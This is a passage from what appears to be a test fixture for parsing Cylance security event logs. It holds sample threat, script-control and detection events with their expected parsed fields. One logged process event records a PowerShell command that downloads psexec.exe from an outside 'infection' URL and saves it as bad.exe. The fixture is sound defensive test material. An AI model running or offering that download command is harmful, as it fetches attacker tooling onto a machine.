All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ScriptControl, Event Name: Alert, Device Name: Unknown CLW 381, File Path: c:/test/test1, SHA256: DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K, Status: Unscored, Interpreter: PowershellScript, Interpreter Version: 10.0.22621.1 (WinBuild.160101.080k), Zone Names: (Windows Zone (Default)), User Name: fakeuser, Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6k, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + additional_details: "" + device_id: "cf753b5b-6ce6-4648-b2df-a827d3560b6k" + device_name: "Unknown CLW 381" + event_type: "ScriptControl" + evt: + name: "Alert" + file_path: "c:/test/test1" + interpreter: "PowershellScript" + interpreter_version: "10.0.22621.1 (WinBuild.160101.080k)" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + script_control_status: "Unscored" + service: "desktop-events" + sha256: "DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + user: "fakeuser" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ScriptControl, Event Name: Alert, Device Name: Unknown CLW 381, File Path: c:/test/test1, SHA256: DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K, Status: Unscored, Interpreter: PowershellScript, Interpreter Version: 10.0.22621.1 (WinBuild.160101.080k), Zone Names: (Windows Zone (Default)), User Name: fakeuser, Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6k, Policy Name: 
Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Threat, Event Name: threat_changed, Device Name: Unknown (test1), IP Address: (10.0.0.0), File Name: fakefile1, Path: c:/test/test1, Drive Type: Internal Hard Drive, SHA256: D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9, MD5: E719222BD4624F1C0A92117FE33E261a, Status: Quarantined, Cylance Score: 96, Found Date: 11/18/2025 8:40:23 AM, File Type: Executable, Is Running: False, Auto Run: False, Detected By: FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: True, Is Unique To Cylance: False, Threat Classification: Malware - Trojan, Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + Status: "Quarantined" + additional_details: "" + auto_run: "False" + cylance_score: 96 + detected_by: "FileWatcher" + device_id: "0929f443-2a56-46b3-bcfe-fc598da81d8b" + device_name: "Unknown (test1)" + drive_type: "Internal Hard Drive" + event_type: "Threat" + evt: + name: "threat_changed" + file_name: "fakefile1" + file_path: "c:/test/test1" + file_state: "Unsafe" + file_type: "Executable" + found_date: "11/18/2025 8:40:23 AM" + ip_addresses: + - "10.0.0.0" + is_malware: "True" + is_running: "False" + is_unique_to_cylance: "False" + md5: "E719222BD4624F1C0A92117FE33E261a" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + sha256: "D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + threat_classification: "Malware - Trojan" + 
zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Threat, Event Name: threat_changed, Device Name: Unknown (test1), IP Address: (10.0.0.0), File Name: fakefile1, Path: c:/test/test1, Drive Type: Internal Hard Drive, SHA256: D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9, MD5: E719222BD4624F1C0A92117FE33E261a, Status: Quarantined, Cylance Score: 96, Found Date: 11/18/2025 8:40:23 AM, File Type: Executable, Is Running: False, Auto Run: False, Detected By: FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: True, Is Unique To Cylance: False, Threat Classification: Malware - Trojan, Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ThreatClassification, Event Name: ThreatUpdated, Threat Class: Malware, Threat Subclass: Trojan, Threat Family: diskwriter, SHA256: 3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149, MD5: D50E739C71C9513B306F3393762CFC85" + result: + custom: + additional_details: "" + event_type: "ThreatClassification" + evt: + name: "ThreatUpdated" + md5: "D50E739C71C9513B306F3393762CFC85" + service: "desktop-events" + sha256: "3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + threat_class: "Malware" + threat_family: "diskwriter" + threat_subclass: "Trojan" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ThreatClassification, Event Name: ThreatUpdated, Threat Class: Malware, Threat Subclass: Trojan, Threat Family: diskwriter, SHA256: 
3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149, MD5: D50E739C71C9513B306F3393762CFC85" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeProcessEvent, Event Name: OpticsCaeProcessEvent, Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: Jeffs Take 2 Powershell Download, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received Timestamp: 2022-06-23T12:54:41Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target Process Name: powershell.exe, Target Process Owner: PENTEST//Administrator, Target Process ImageFileSha256: BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process Command Line: powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + result: + custom: + additional_details: "" + description: "Jeffs Take 2 Powershell Download" + detection_rule_id: "3f110342-88f8-11ec-a8a3-0242ac120002" + device_id: "3514593e-7405-4319-8ca5-8ec876bf0195" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER2" + event_id: "dbe47fda-f37b-42cc-a308-9675feb7e36a" + event_received_timestamp: "2022-06-23T12:54:41Z" + event_timestamp: 
"2022-06-23T12:54:15.811Z" + event_type: "OpticsCaeProcessEvent" + evt: + name: "OpticsCaeProcessEvent" + instigating_process_command_line: "\"C:\\Windows\\system32\\cmd.exe\" " + instigating_process_file_path: "c:\\windows\\system32\\cmd.exe" + instigating_process_imagefilesha256: "935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2" + instigating_process_name: "cmd.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "High" + status: "critical" + target_process_command_line: "powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\"" + target_process_file_path: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + target_process_imagefilesha256: "BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436" + target_process_name: "powershell.exe" + target_process_owner: "PENTEST//Administrator" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(39BFDA7FEF71490584AAB4F163142350)" + zone_names: "(Jeff Test)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeProcessEvent, Event Name: OpticsCaeProcessEvent, Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: Jeffs Take 2 Powershell Download, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received Timestamp: 2022-06-23T12:54:41Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: 
c:\\windows\\system32\\cmd.exe, Target Process Name: powershell.exe, Target Process Owner: PENTEST//Administrator, Target Process ImageFileSha256: BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process Command Line: powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeFileEvent, Event Name: OpticsCaeFileEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, Description: SYSLOG detections - Looking for a created file cylancetest.txt, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt, Target File Owner: BUILTIN//Administrators, Target File Sha256: ueirjftkgpokfjrkjfmlrmf, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - Looking for a created file cylancetest.txt" + detection_rule_id: 
"74bd0e7e-281a-4d7b-9f84-d0f51346782c" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "f4739af7-9c8b-4dc0-aeb7-2d4533445d49" + event_received_timestamp: "2022-06-28T18:09:36Z" + event_timestamp: "2022-06-28T18:09:32.693Z" + event_type: "OpticsCaeFileEvent" + evt: + name: "OpticsCaeFileEvent" + instigating_process_command_line: "\"C:\\Windows\\system32\\cmd.exe\" " + instigating_process_file_path: "c:\\windows\\system32\\cmd.exe" + instigating_process_imagefilesha256: "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527" + instigating_process_name: "cmd.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + target_file_owner: "BUILTIN//Administrators" + target_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt" + target_process_imagefilesha256: "ueirjftkgpokfjrkjfmlrmf" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeFileEvent, Event Name: OpticsCaeFileEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, Description: SYSLOG detections - Looking for a created file cylancetest.txt, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: 
(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt, Target File Owner: BUILTIN//Administrators, Target File Sha256: ueirjftkgpokfjrkjfmlrmf, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeRegistryEvent, Event Name: OpticsCaeRegistryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, Description: SYSLOG detections - RegistryKey \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Instigating Process Name: ICreatePersistencePoints.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, Event Timestamp: 2022-06-28T18:08:49.103Z, Event Received Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, Instigating Process Command Line: ICreatePersistencePoints.exe --trigger 0, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe, Target Registry KeyPath: HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Target Registry ValueName: Unknown, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - RegistryKey 
\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext" + detection_rule_id: "74354415-7d28-4f31-830d-72a14c0c3d8b" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "6d33d636-dcdc-48c2-911a-ead99ac17f88" + event_received_timestamp: "2022-06-28T18:08:54Z" + event_timestamp: "2022-06-28T18:08:49.103Z" + event_type: "OpticsCaeRegistryEvent" + evt: + name: "OpticsCaeRegistryEvent" + instigating_process_command_line: "ICreatePersistencePoints.exe --trigger 0" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe" + instigating_process_imagefilesha256: "F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5" + instigating_process_name: "ICreatePersistencePoints.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + target_registry_keypath: "HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext" + target_registry_valuename: "Unknown" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeRegistryEvent, Event Name: OpticsCaeRegistryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, Description: SYSLOG detections - RegistryKey \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Instigating Process Name: ICreatePersistencePoints.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, Event Timestamp: 
2022-06-28T18:08:49.103Z, Event Received Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, Instigating Process Command Line: ICreatePersistencePoints.exe --trigger 0, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe, Target Registry KeyPath: HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Target Registry ValueName: Unknown, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeNetworkEvent, Event Name: OpticsCaeNetworkEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 23a04c4c-1a97-4a58-b4bc-fadadb729e30, Severity: Medium, Description: SYSLOG detections - Looking for NetworkConnection 8.8.8.9, Instigating Process Name: ICreateNetworkConnections.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009, Event Timestamp: 2022-06-28T18:09:56.392Z, Event Received Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB), Detection Rule Id: fdac76c0-5c6b-4b6f-8062-e074457afe3e, Instigating Process Command Line: ICreateNetworkConnections.exe --sequential 8.9.8.8, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe, Destination IP: 10.8.8.81, Destination Port: 29286, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1959, Source IP: 192.168.254.108, Source Port: 52910" + result: + custom: + 
additional_details: "" + description: "SYSLOG detections - Looking for NetworkConnection 8.8.8.9" + detection_rule_id: "fdac76c0-5c6b-4b6f-8062-e074457afe3e" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1959" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "23a04c4c-1a97-4a58-b4bc-fadadb729e30" + event_received_timestamp: "2022-06-28T18:10:00Z" + event_timestamp: "2022-06-28T18:09:56.392Z" + event_type: "OpticsCaeNetworkEvent" + evt: + name: "OpticsCaeNetworkEvent" + instigating_process_command_line: "ICreateNetworkConnections.exe --sequential 8.9.8.8" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe" + instigating_process_imagefilesha256: "F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009" + instigating_process_name: "ICreateNetworkConnections.exe" + instigating_process_owner: "PENTEST//Administrator" + network: + client: + geoip: {} + ip: "192.168.254.108" + port: "52910" + destination: + geoip: {} + ip: "10.8.8.81" + port: "29286" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeNetworkEvent, Event Name: OpticsCaeNetworkEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 23a04c4c-1a97-4a58-b4bc-fadadb729e30, Severity: Medium, Description: SYSLOG detections - Looking for NetworkConnection 8.8.8.9, Instigating Process Name: ICreateNetworkConnections.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009, Event Timestamp: 
2022-06-28T18:09:56.392Z, Event Received Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB), Detection Rule Id: fdac76c0-5c6b-4b6f-8062-e074457afe3e, Instigating Process Command Line: ICreateNetworkConnections.exe --sequential 8.9.8.8, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe, Destination IP: 10.8.8.81, Destination Port: 29286, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1959, Source IP: 192.168.254.108, Source Port: 52910" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeDnsEvent, Event Name: OpticsCaeDnsEvent, Device Name: SECURITYSERVER, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, Description: Win_Suspicious_DNSLength_MitreT1071, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Target Domain Name: 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., Resolved Address: securityserver.Pentest.Local, Resolved Address Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + result: + custom: + additional_details: "" + description: "Win_Suspicious_DNSLength_MitreT1071" + detection_rule_id: 
"0da4f7c3-af0d-46be-8f6b-1884a1c67331" + device_id: "41666e82-50e6-4777-88b6-5f2b567027b9" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER" + dns: + question: + name: "7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local." + event_id: "6458f3ac-e527-4922-83ac-654518c3137e" + event_received_timestamp: "2022-06-28T17:34:33Z" + event_timestamp: "2022-06-28T17:34:12.772Z" + event_type: "OpticsCaeDnsEvent" + evt: + name: "OpticsCaeDnsEvent" + instigating_process_command_line: "C:\\Windows\\system32\\lsass.exe" + instigating_process_file_path: "c:\\windows\\system32\\lsass.exe" + instigating_process_imagefilesha256: "91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F" + instigating_process_name: "lsass.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + resolved_address: "securityserver.Pentest.Local" + resolved_address_count: 1 + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeDnsEvent, Event Name: OpticsCaeDnsEvent, Device Name: SECURITYSERVER, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, Description: Win_Suspicious_DNSLength_MitreT1071, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, 
Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Target Domain Name: 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., Resolved Address: securityserver.Pentest.Local, Resolved Address Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeLogEvent, Event Name: OpticsCaeLogEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security Provider: SecurityAuditProvider, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "Win_CreateAccount_MitreT1136" + detection_rule_id: "266e750f-a838-4974-9afc-20cb863031cc" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "ba8810a9-afac-4579-82a2-638f0f584d60" + event_received_timestamp: "2022-06-28T18:17:10Z" + event_timestamp: "2022-06-28T18:17:05.001Z" + event_type: "OpticsCaeLogEvent" + evt: + name: "OpticsCaeLogEvent" + 
